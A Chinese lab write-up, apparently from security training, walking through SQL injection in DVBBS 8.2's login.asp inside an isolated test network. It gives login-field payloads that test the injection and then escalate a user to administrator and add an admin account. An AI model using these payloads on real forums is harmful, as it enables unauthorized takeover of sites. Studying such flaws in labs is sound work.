动网论坛8.2经典注入漏洞利用
2017-01-23 21:16
706 查看
一、实验目的
理解动网论坛8.2原理二、实验原理
动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。三、实验环境
本机:192.168.1.2目标机:192.168.1.3
四、 实验步骤
一、正常注册登录1、访问地址:http://192.168.1.3:8010/,如图示:
2、首先注册一个用户:san 密码:123456,如图:
二、漏洞测试与利用
1、退出san ,打开登录界面:
2、使用以下语句登录:san’ and ‘a’=’ a 密码:123456
3、使用以下语句再次登录:san’ and ‘a’=’ b 密码:123456
4、提示用户不存在,说明以上语句起作用了,用户名处输入:
,;update dv_user set usergroupid=1 where username='san'--
5、提示用户名不存在,我们再次使用正确用户名和密码san 123456登录。在控制面板-我能做什么中,点击后,显示已是管理员组用户。
6、san用户为管理员身份,退出,我们再次使用以下语句登录,密码为正确密码(此处步骤重要):
san’;insert into dv_admin
7、打开管理员界面http://192.168.1.3:8010/admin
使用用户名:admin 密码:123456成功登陆
8、登陆后发现已是管理员身份,如图:
相关文章推荐
- 动态论坛经典的注入漏洞利用
- 利用Request对象的包解析漏洞绕过防注入程序(hackbar)
- DVBBS 8.2 漏洞利用
- Codeigniter 利用加密Key(密钥)的对象注入漏洞
- 利用搜索引擎批量搜索注入漏洞SQL注入(2)
- bind8.2-8.2.2漏洞利用HOWTO(端口53的利用)
- 利用XSS注入漏洞能对网站做什么
- 利用XSS注入漏洞能对网站做什么
- 风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用
- Python Discuz 7.2 faq.php 注入漏洞全自动利用工具
- 利用XSS注入漏洞能对网站做什么
- 网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用
- 利用登陆文件注入漏洞给网页挂马
- Drupal 7.31SQL注入getshell漏洞利用详解及EXP
- 利用joomla 3.2.0 – 3.4.4 注入漏洞到getshell
- 什么是注入?黑客们是怎样利用注入漏洞攻击网站的?
- Codeigniter 利用加密Key(密钥)的对象注入漏洞
- 动网8.0sql最新注入漏洞+利用工具
- DVBBS 8.2 漏洞利用
- win32k.sys驱动的注入与利用漏洞